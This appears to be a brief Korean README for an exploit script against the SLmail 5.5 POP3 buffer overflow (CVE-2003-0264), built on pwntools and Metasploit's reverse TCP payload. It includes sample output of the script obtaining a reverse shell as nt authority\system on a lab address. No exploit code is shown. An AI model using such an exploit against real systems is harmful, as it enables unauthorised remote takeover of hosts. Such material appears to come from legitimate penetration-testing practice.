
pwntools와 metasploit의 windows/reverse_tcp를 기반으로 하는 CVE-2003-0264용 익스플로잇
SLmail 5.5의 버퍼 오버플로우 익스플로잇 (CVE-2003-0264)
기반:
Example output:
$ ./slmail-into-shell.py
[+] Opening connection to 192.168.15.100 on port 110: Done
[+] Trying to bind to 0.0.0.0 on port 4444: Done
[+] Waiting for connections on 0.0.0.0:4444: Got connection from 192.168.15.100 on port 49168
[*] Received server hello
[*] Switching to interactive mode
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\SLmail\System>$ whoami
whoami
nt authority\system
C:\Program Files (x86)\SLmail\System>$
[*] Closed connection to 192.168.15.100 port 49168
[*] Closed connection to 192.168.15.100 port 110